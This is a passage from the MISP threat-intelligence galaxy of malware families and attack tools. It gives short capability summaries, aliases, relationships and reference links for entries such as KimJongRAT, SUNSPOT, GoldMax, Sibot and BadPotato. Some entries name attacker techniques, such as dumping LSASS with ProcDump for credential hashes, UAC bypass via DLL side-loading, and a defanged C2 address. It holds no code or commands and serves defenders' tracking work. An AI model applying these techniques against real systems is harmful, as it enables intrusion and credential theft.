The tag is: misp-galaxy:tool="Karkoff"

Karkoff has relationships with:

  • similar: misp-galaxy:malpedia="Karkoff" with estimative-language:likelihood-probability="almost-certain"

Table 16702. Table References

Links

https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html

KimJongRAT

We conclude that this RAT/stealeris efficient and was also really interesting to analyse.Furthermore, the creator made effortsto look Korean, for example the author of the .pdf file is Kim Song Chol. He is the brother of Kim Jong-un, the leader of North Korea. We identified that the author of a variant of this stealer is another brother of Kim Jong-un. Maybe the author named every variant withthe name of each brother. After some searches using Google, we identified anold variant of this malware here: http://contagiodump.blogspot.ca/2010/10/oct-08-cve-2010-2883-pdf-nuclear.html. The code of the malware available on the blog is closeto our case but with fewer features. In 2010, the password of the Gmail account was futurekimkim. Three years ago, the author was already fixatedon the Kim family…​The language of the resource stored in the .dll file is Korean (LANG_KOREAN). The owner of the gmail mailbox is laoshi135.zhangand the secret question of this account is in Korean too.We don’t know if the malware truly comesfrom Korea.However, thanks to these factors, we decided to name this sample KimJongRAT/Stealer.

The tag is: misp-galaxy:tool="KimJongRAT"

KimJongRAT has relationships with:

  • similar: misp-galaxy:malpedia="KimJongRat" with estimative-language:likelihood-probability="almost-certain"

Table 16703. Table References

Links

https://malware.lu/assets/files/articles/RAP003_KimJongRAT-Stealer_Analysis.1.0.pdf

Cowboy

Based on our research, it appears the malware author calls the encoded secondary payload “Cowboy” regardless of what malware family is delivered.

The tag is: misp-galaxy:tool="Cowboy"

Table 16704. Table References

Links

https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/

JasperLoader

JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process.

The tag is: misp-galaxy:tool="JasperLoader"

JasperLoader has relationships with:

  • similar: misp-galaxy:malpedia="JasperLoader" with estimative-language:likelihood-probability="almost-certain"

Table 16705. Table References

Links

https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html?m=1

Scranos

The malware Scranos infects with rootkit capabilities, burying deep into vulnerable Windows computers to gain persistent access — even after the computer restarts. Scranos only emerged in recent months, according to Bitdefender with new research out Tuesday, but the number of its infections has rocketed in the months since it was first identified in November.

The tag is: misp-galaxy:tool="Scranos"

Scranos has relationships with:

  • similar: misp-galaxy:malpedia="Scranos" with estimative-language:likelihood-probability="almost-certain"

Table 16706. Table References

Links

https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/

https://techcrunch.com/2019/04/16/scranos-rootkit-passwords-payments/?guccounter=1&guce_referrer_us=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_cs=MrGSn18TmNoWovpLbekFYA

Reaver

Unit 42 has discovered a new malware family we’ve named “Reaver” with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010. The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.

The tag is: misp-galaxy:tool="Reaver"

Reaver has relationships with:

  • similar: misp-galaxy:tool="SunOrcal" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:tool="SURTR" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:malpedia="Reaver" with estimative-language:likelihood-probability="almost-certain"

Table 16707. Table References

Links

https://unit42.paloaltonetworks.com/unit42-new-malware-with-ties-to-sunorcal-discovered/

https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html

SURTR

The Citizen Lab analyzed a malicious email sent to Tibetan organizations in June 2013. The email in question purported to be from a prominent member of the Tibetan community and repurposed content from a community mailing list. Attached to the email were what appeared to be three Microsoft Word documents (.doc), but which were trojaned with a malware family we call “Surtr”.1 All three attachments drop the exact same malware. We have seen the Surtr malware family used in attacks on Tibetan groups dating back to November 2012.

The tag is: misp-galaxy:tool="SURTR"

SURTR has relationships with:

  • similar: misp-galaxy:tool="Reaver" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:tool="SunOrcal" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:malpedia="surtr" with estimative-language:likelihood-probability="almost-certain"

Table 16708. Table References

Links

https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/

https://otx.alienvault.com/pulse/588a7c8fe4166d1d84244b9a

SunOrcal

SunOrcal is a trojan malware family whose activity dates back to at least 2013. A version discovered in November 2017 incorporates steganography techniques and can collect C2 information via GitHub, obscuring its C2 infrastructure and evading detection using the legitimate site for its first beacon. The threat actors have targeted users in the Vietnam area, spreading phishing emails containing malicious documents purportedly regarding South China Sea disputes. The new SunOrcal version has also been used with the recently discovered Reaver trojan and the original SunOrcal version. Some of the recent activity also incorporates the use of the Surtr malware.

The tag is: misp-galaxy:tool="SunOrcal"

SunOrcal has relationships with:

  • similar: misp-galaxy:tool="Reaver" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:tool="SURTR" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:malpedia="SunOrcal" with estimative-language:likelihood-probability="almost-certain"

Table 16709. Table References

Links

https://unit42.paloaltonetworks.com/unit42-sunorcal-adds-github-steganography-repertoire-expands-vietnam-myanmar/

https://www.cyber.nj.gov/threat-profiles/trojan-variants/sunorcal

Bookworm

Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand. Readers who are interested in this campaign should start with our first blog that lays out the overall functionality of the malware and introduces its many components. Unit 42 does not have detailed targeting information for all known Bookworm samples, but we are aware of attempted attacks on at least two branches of government in Thailand. We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents, as well as several of the dynamic DNS domain names used to host C2 servers that contain the words “Thai” or “Thailand”. Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand.

The tag is: misp-galaxy:tool="Bookworm"

Bookworm has relationships with:

  • similar: misp-galaxy:malpedia="Bookworm" with estimative-language:likelihood-probability="almost-certain"

Table 16710. Table References

Links

https://unit42.paloaltonetworks.com/attack-campaign-on-the-government-of-thailand-delivers-bookworm-trojan/

https://unit42.paloaltonetworks.com/bookworm-trojan-a-model-of-modular-architecture/

Amavaldo

We named the malware family described in the rest of this blog post Amavaldo. This family is still in active development – the latest version we have observed (10.7) has a compilation timestamp of June 10th, 2019.

The tag is: misp-galaxy:tool="Amavaldo"

Table 16711. Table References

Links

https://www.welivesecurity.com/2019/08/01/banking-trojans-amavaldo/

TVSPY

hacker going by the handle Mr. Burns. He also created something similar called RMS, which behaves very much like the TVSPY builder. “RMS/TVSPY continues to be developed, with a new version being posted by the developer/reseller on a regular basis,” Damballa researchers noted. “In fact, the legitimate RMS version developed by TektonIT and the version posted in criminal forums appear to be identical. TVSPY seems to be merely a modification of RMS to utilize TeamViewer infrastructure and a command-and-control interface manageable through the Web.

The tag is: misp-galaxy:tool="TVSPY"

TVSPY is also known as:

  • TVRAT

  • SpY-Agent

  • teamspy

Table 16712. Table References

Links

https://mobile.twitter.com/SaudiDFIR/status/1177740045186457600

COMpfun

The COMpfun malware was initially documented by G-DATA in 2014. Although G-DATA didn’t identify which actor was using this malware, Kaspersky tentatively linked it to the Turla APT, based on the victimology. Our telemetry indicates that the current campaign using Reductor started at the end of April 2019 and remained active at the time of writing (August 2019). We identified targets in Russia and Belarus.

The tag is: misp-galaxy:tool="COMpfun"

COMpfun has relationships with:

  • similar: misp-galaxy:malpedia="COMpfun" with estimative-language:likelihood-probability="almost-certain"

Table 16713. Table References

Links

https://securelist.com/compfun-successor-reductor/93633/

https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

Reductor

We called these new modules ‘Reductor’ after a .pdb path left in some samples. Besides typical RAT functions such as uploading, downloading and executing files, Reductor’s authors put a lot of effort into manipulating digital certificates and marking outbound TLS traffic with unique host-related identifiers. The Kaspersky Attribution Engine shows strong code similarities between this family and the COMPfun Trojan. Moreover, further research showed that the original COMpfun Trojan most probably is used as a downloader in one of the distribution schemes. Based on these similarities, we’re quite sure the new malware was developed by the COMPfun authors.

The tag is: misp-galaxy:tool="Reductor"

Table 16714. Table References

Links

https://securelist.com/compfun-successor-reductor/93633/

ProcDump

Legitimate tool - command-line tool used to monitor a running process and dump memory depending on customcriteria. The attackers use this tool to dump the LSASS process to gatherWINDOWScredentials hashes

The tag is: misp-galaxy:tool="ProcDump"

CertMig

Legitimate tool - command-line tool used to import and export certificates on a machine. The attackers use this toolto gather credentials used for VPN authentication to the clients’ networks

The tag is: misp-galaxy:tool="CertMig"

Netscan

Legitimate tool - tool used to scan IPv4/IPv6 networks and remotely execute PowerShell commands.

The tag is: misp-galaxy:tool="Netscan"

ShadowHammer

Malware embedded in Asus Live Update in 2018. ShadowHammer triggers its malicious behavior only if the computer it is running on has a network adapter with the MAC address whitelisted by the attacker.

The tag is: misp-galaxy:tool="ShadowHammer"

ShadowHammer has relationships with:

  • similar: misp-galaxy:malpedia="shadowhammer" with estimative-language:likelihood-probability="almost-certain"

Table 16715. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf

DePriMon

DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, we consider it to be a framework.

The tag is: misp-galaxy:tool="DePriMon"

DePriMon has relationships with:

  • similar: misp-galaxy:malpedia="Deprimon" with estimative-language:likelihood-probability="almost-certain"

Table 16716. Table References

Links

https://www.bleepingcomputer.com/news/security/deprimon-malware-registers-itself-as-a-windows-print-monitor/

https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/

Private Internet Access

Private Internet Access provides state of the art, multi-layered security with advanced privacy protection using VPN tunneling.

The tag is: misp-galaxy:tool="Private Internet Access"

Private Internet Access is also known as:

  • PIA

Table 16717. Table References

Links

https://www.privateinternetaccess.com/

Netcat

Reads from and writes to network connections using TCP or UDP protocols.

The tag is: misp-galaxy:tool="Netcat"

NBTScan

NBTScan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts). It sends a NetBIOS status query to each address in a supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address.

The tag is: misp-galaxy:tool="NBTScan"

Table 16718. Table References

Links

https://sectools.org/tool/nbtscan/

PowerGhost

PowerGhost is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system.

The tag is: misp-galaxy:tool="PowerGhost"

Table 16719. Table References

Links

https://securelist.com/a-mining-multitool/86950/

VBEtaly

Check Point researchers have found another wave of the Ursnif malspam campaign targeting Italy. Only a few details are known so far but what we have found is that the file delivered is a VBE file (encoded VBS) named “SCANSIONE.vbe” and is delivered via ZIP attachments in emails with the subject suggesting different documents in Italian.

The tag is: misp-galaxy:tool="VBEtaly"

Table 16720. Table References

Links

https://research.checkpoint.com/vbetaly/

ZeroCleare

ZeroCleare was used to execute a destructive attack that affected organizations in the energy and industrial sectorsin the Middle East. Based on the analysis of the malware and the attackers’ behavior, we suspect Iran-based nation state adversaries were involved to develop and deploy this new wiper.

The tag is: misp-galaxy:tool="ZeroCleare"

ZeroCleare has relationships with:

  • similar: misp-galaxy:malpedia="ZeroCleare" with estimative-language:likelihood-probability="almost-certain"

Table 16721. Table References

Links

https://www.ibm.com/downloads/cas/OAJ4VZNJ

Dustman

At the heart of the recent Bapco attack is a new strain of malware named Dustman. According to an analysis by Saudi Arabia’s cyber-security agency, Dustman is a so-called data wiper — malware designed to delete data on infected computers, once launched into execution. Dustman represents the third different data-wiping malware linked to the Tehran regime. Iranian state-backed hackers have a long history of developing data-wiping malware.

The tag is: misp-galaxy:tool="Dustman"

Dustman has relationships with:

  • similar: misp-galaxy:malpedia="DUSTMAN" with estimative-language:likelihood-probability="almost-certain"

Table 16722. Table References

Links

https://mobile.twitter.com/IntezerLabs/status/1215252764080644098

Autochk Rootkit

This rootkit is a very simple. The name of the driver is “autochk.sys” - that’s why we’ll call it the autochk rootkit. The rootkit implements 2 functionalities: File Redirection and Network Connection Hiding.

The tag is: misp-galaxy:tool="Autochk Rootkit"

Table 16723. Table References

Links

https://repnz.github.io/posts/autochk-rootkit-analysis/

Lampion

New trojan called Lampion has spread using template emails from the Portuguese Government Finance & Tax during the last days of 2019.

The tag is: misp-galaxy:tool="Lampion"

Lampion has relationships with:

  • similar: misp-galaxy:malpedia="lampion" with estimative-language:likelihood-probability="almost-certain"

Table 16724. Table References

Links

https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/

LiquorBot

Bitdefender researchers tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features.

The tag is: misp-galaxy:tool="LiquorBot"

LiquorBot has relationships with:

  • similar: misp-galaxy:malpedia="LiquorBot" with estimative-language:likelihood-probability="almost-certain"

Table 16725. Table References

Links

https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/

Gelup malware tool

Written in C++ and designed to function as a downloader of other malware, Gelup stood out for its obfuscation techniques. Gelup can also bypass User Account Control (UAC) by mocking trusted directories, abusing auto-elevated executables and using the Dynamic Link Library (DLL) side-loading technique.

The tag is: misp-galaxy:tool="Gelup malware tool"

Gelup malware tool is also known as:

  • AndroMut

Table 16726. Table References

Links

https://securityintelligence.com/news/ta505-delivers-new-gelup-malware-tool-flowerpippi-backdoor-via-spam-campaign/

DenesRAT

DenesRAT is a private Trojan horse of the "Sea Lotus" organization, which can perform corresponding functions according to the instructions issued by the C2 server. The main functions are file operations, such as creating files or directories, deleting files or directories, finding files; registry reading and writing; remote code execution, such as creating processes, executing DLLs, etc…​.

The tag is: misp-galaxy:tool="DenesRAT"

DenesRAT is also known as:

  • METALJACK

Table 16727. Table References

Links

http://baijiahao.baidu.com/s?id=1661498030941117519

https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html

Covenant

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.

The tag is: misp-galaxy:tool="Covenant"

Covenant is also known as:

Table 16729. Table References

Links

https://github.com/cobbr/Covenant/

Cobalt Strike

Cobalt Strike is a post-exploitation framework.

The tag is: misp-galaxy:tool="Cobalt Strike"

Cobalt Strike is also known as:

Cobalt Strike has relationships with:

  • similar: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="almost-certain"

Table 16730. Table References

Links

https://www.cobaltstrike.com

metasploit

METASPLOIT is a penetration testing framework whose features include vulnerability testing, network enumeration, payload generation and execution, and defense evasion. Availability: Public

The tag is: misp-galaxy:tool="metasploit"

metasploit is also known as:

Table 16731. Table References

Links

https://www.metasploit.com

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

CrackMapExec

A swiss army knife for pentesting networks. CRACKMAPEXEC is a post-exploitation tool against Microsoft Windows environments. It is recognized for its lateral movement capabilities.

The tag is: misp-galaxy:tool="CrackMapExec"

CrackMapExec is also known as:

Table 16732. Table References

Links

https://github.com/byt3bl33d3r/CrackMapExec

https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

WellMess

Wellmess is a Remote Access Trojan written in Golang and also have a .NET version

The tag is: misp-galaxy:tool="WellMess"

WellMess is also known as:

WellMess has relationships with:

  • similar: misp-galaxy:malpedia="WellMess" with estimative-language:likelihood-probability="almost-certain"

Table 16733. Table References

Links

https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf

https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html

https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

WellMail

WellMail is a lightweight tool designed to run commands or scripts with the results being sent to a hardcoded Command and Control (C2) server.

The tag is: misp-galaxy:tool="WellMail"

WellMail is also known as:

WellMail has relationships with:

  • similar: misp-galaxy:malpedia="WellMail" with estimative-language:likelihood-probability="almost-certain"

Table 16734. Table References

Links

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

Drovorub

Drovorub is a Linux malware toolset consisting of an implant coupled with a kernel module rootkit, a file transfer and port forwarding tool, and a Command and Control (C2) server.

The tag is: misp-galaxy:tool="Drovorub"

Drovorub is also known as:

Table 16735. Table References

Links

https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

IsErIk

The adware DealPly (sometimes also referred to as IsErIk) and malicious Chrome extension ManageX, for instance, can come bundled under the guise of a legitimate installer and other potentially unwanted applications (PUAs). Because various write-ups cover Dealply or IsErik separately, the technical discussion and representation of both are discussed separately.

The tag is: misp-galaxy:tool="IsErIk"

IsErIk is also known as:

  • DealPly

  • ManageX

Table 16736. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/exposing-modular-adware-how-dealply-iserik-and-managex-persist-in-systems/

Vatet

Attackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.

The tag is: misp-galaxy:tool="Vatet"

Table 16737. Table References

Links

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.tripwire.com/state-of-security/featured/ransomware-characteristics-attack-chains-recent-campaigns/

ConfuserEx

ConfuserEx is a common .NET packer/protector used to obfuscate .NET assemblies and confuse the decompilation process. According to the official site: ConfuserEx is an free, open-source protector for .NET applications. It is the successor of Confuser project. ConfuserEx supports .NET Framework from 2.0 - 4.5 and Mono (and other .NET platforms if enough request!). It supports most of the protections you’ll find in commerical protectors, and some more!

The tag is: misp-galaxy:tool="ConfuserEx"

Table 16738. Table References

Links

https://yck1509.github.io/ConfuserEx/

https://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html

Beds Protector

Beds Protector is a common .NET packer/protector. It is a mod of ConfuserEx, which is another common .NET packer/protector. It is commonly used to obfuscate .NET assemblies and confuse the decompilation process. The latest available version is Beds Protector v1.4.1

The tag is: misp-galaxy:tool="Beds Protector"

Table 16739. Table References

Links

https://github.com/BedTheGod/ConfuserEx-Mod-By-Bed

HyperBro

HyperBro Trojan was used as last-stage in-memory remote administration tool (RAT).

The tag is: misp-galaxy:tool="HyperBro"

HyperBro has relationships with:

  • similar: misp-galaxy:malpedia="HyperBro" with estimative-language:likelihood-probability="almost-certain"

Table 16740. Table References

Links

https://securelist.com/luckymouse-hits-national-data-center/86083/

SUNSPOT

SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.

The tag is: misp-galaxy:tool="SUNSPOT"

SUNSPOT has relationships with:

  • dropped: misp-galaxy:backdoor="SUNBURST" with estimative-language:likelihood-probability="likely"

Table 16741. Table References

Links

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

Caterpillar WebShell

The tag is: misp-galaxy:tool="Caterpillar WebShell"

Table 16742. Table References

Links

https://www.clearskysec.com/cedar/

P.A.S. webshell

The P.A.S. webshell was developed by an ukrainian student, Jaroslav Volodimirovich Panchenko, who used the nick-name Profexer. It was developed in PHP and features a characteristic password-based encryption. This tool was available through a form on his website, where a user had to provide a password to receive a custom webshell. The form suggested a donation to the developer. It was commonly used, including during a WORDPRESS website attack.

The tag is: misp-galaxy:tool="P.A.S. webshell"

P.A.S. webshell is also known as:

  • Fobushell

Table 16743. Table References

Links

https://us-cert.cisa.gov/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf

Exaramel

Exaramel is a backdoor first publicly reported by ESET in 2018. Two samples were identified, one targeting the WINDOWS operating system and the other targeting LINUX operating systems.

The tag is: misp-galaxy:tool="Exaramel"

Table 16744. Table References

Links

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf

RDAT

RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.

The tag is: misp-galaxy:tool="RDAT"

RDAT has relationships with:

  • similar: misp-galaxy:malpedia="RDAT" with estimative-language:likelihood-probability="almost-certain"

Table 16745. Table References

Links

https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

TEARDROP

Loader used in hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders.

The tag is: misp-galaxy:tool="TEARDROP"

TEARDROP has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:tool="Raindrop" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TEARDROP" with estimative-language:likelihood-probability="almost-certain"

Table 16746. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

GoldMax

Written in Go, GoldMax acts as command-and-control backdoor for the actor. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running. GoldMax establishes a secure session key with its C2 and uses that key to securely communicate with the C2, preventing non-GoldMax-initiated connections from receiving and identifying malicious traffic. The C2 can send commands to be launched for various operations, including native OS commands, via psuedo-randomly generated cookies. The hardcoded cookies are unique to each implant, appearing to be random strings but mapping to victims and operations on the actor side.

The tag is: misp-galaxy:tool="GoldMax"

GoldMax has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="GoldMax" with estimative-language:likelihood-probability="almost-certain"

Table 16747. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Raindrop

Loader used in hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders.

The tag is: misp-galaxy:tool="Raindrop"

Raindrop has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:tool="TEARDROP" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Raindrop" with estimative-language:likelihood-probability="almost-certain"

Table 16748. Table References

Links

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

GoldFinder

Tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g., hxxps://185[.]225[.]69[.]69/) and logs the HTTP response to a plaintext log file (e.g., loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file:

The tag is: misp-galaxy:tool="GoldFinder"

GoldFinder has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 16749. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Sibot

Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk. The VBScript is then run via a scheduled task.

The tag is: misp-galaxy:tool="Sibot"

Sibot has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 16750. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Matanbuchus

Matanbuchus is a loader promoted by BelialDemon. It can launch an EXE or DLL file in memory, leverage schtasks.exe to add or modify task schedules, and launch custom PowerShell commands, among other capabilities. Attackers use a Microsoft Excel document as the initial vector to drop the Matanbuchus Loader DLL.

The tag is: misp-galaxy:tool="Matanbuchus"

Matanbuchus has relationships with:

  • similar: misp-galaxy:malpedia="Matanbuchus" with estimative-language:likelihood-probability="almost-certain"

Table 16751. Table References

Links

https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/

BLUELIGHT

It is likely that BLUELIGHT is used as a secondary payload following successful delivery of Cobalt Strike.

The tag is: misp-galaxy:tool="BLUELIGHT"

Table 16752. Table References

Links

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

ESPecter bootkit

ESET researchers have analyzed a previously undocumented, real-world UEFI bootkit that persists on the EFI System Partition (ESP). The bootkit, which we’ve named ESPecter, can bypass Windows Driver Signature Enforcement to load its own unsigned driver, which facilitates its espionage activities. Alongside Kaspersky’s recent discovery of the unrelated FinSpy bootkit, it is now safe to say that real-world UEFI threats are no longer limited to SPI flash implants, as used by Lojax.

The tag is: misp-galaxy:tool="ESPecter bootkit"

Table 16753. Table References

Links

https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp-introducing-especter-bootkit/

https://github.com/eset/malware-ioc/tree/master/especter

Shark

Shark is a 32-bit executable written in C# and .NET. To run Shark, a parameter is passed on the command line that includes the executable’s filename. Shark generates a mutex that uses the executable’s filename as the mutex value. The mutex likely ensures Shark does not execute on a machine where it is already running and that the correct version of Shark is executed.

The tag is: misp-galaxy:tool="Shark"

Shark has relationships with:

  • similar: misp-galaxy:malpedia="Shark" with estimative-language:likelihood-probability="almost-certain"

Table 16754. Table References

Links

https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/

Motnug

Motnug is a simple shellcode loader that is used to load and execute shellcode located either in its overlay or in a separate file stored on disk.

The tag is: misp-galaxy:tool="Motnug"

Table 16755. Table References

Links

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/

BadPotato

BadPotato leaks a system token handle through the MS RPN API, which can be used to get NT AUTHORITY\SYSTEM access.

The tag is: misp-galaxy:tool="BadPotato"

Table 16756. Table References

Links

https://github.com/BeichenDream/BadPotato

https://www.mandiant.com/resources/apt41-us-state-governments

https://thehackernews.com/2021/06/chinese-hackers-believed-to-be-behind.html

https://blog.group-ib.com/colunmtk_apt41

Microcin

A simple RAT used by Vicious Panda

The tag is: misp-galaxy:tool="Microcin"

Microcin is also known as:

  • Mikroceen

Microcin has relationships with:

  • similar: misp-galaxy:malpedia="Microcin" with estimative-language:likelihood-probability="almost-certain"

Table 16757. Table References

Links

https://securelist.com/microcin-is-here/97353

https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636

https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia

https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign

Esile

The Esile campaign was named after certain strings found in the unpacked malware file that it sends out. All of the malware related to this campaign are detected as BKDR_ESILE variants.

The tag is: misp-galaxy:tool="Esile"

Esile is also known as:

  • BKDR_ESILE

Esile has relationships with:

  • used-by: misp-galaxy:threat-actor="LOTUS PANDA" with estimative-language:likelihood-probability="likely"

Table 16758. Table References

Links

https://www.trendmicro.com/vinfo/de/security/news/cyber-attacks/esile-targeted-attack-campaign-hits-apac-governments

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/esile

MOUSEISLAND

MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email (Figure 2). Based on our intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID. Mandiant attributes the MOUSEISLAND distribution of PHOTOLOADER and other payloads to UNC2420, a distribution threat cluster created by Mandiant’s Threat Pursuit team. UNC2420 activity shares overlaps with the publicly reported nomenclature of “Shathak” or “TA551”.

The tag is: misp-galaxy:tool="MOUSEISLAND"

MOUSEISLAND has relationships with:

  • similar: misp-galaxy:malpedia="MOUSEISLAND" with estimative-language:likelihood-probability="almost-certain"

Table 16759. Table References

Links

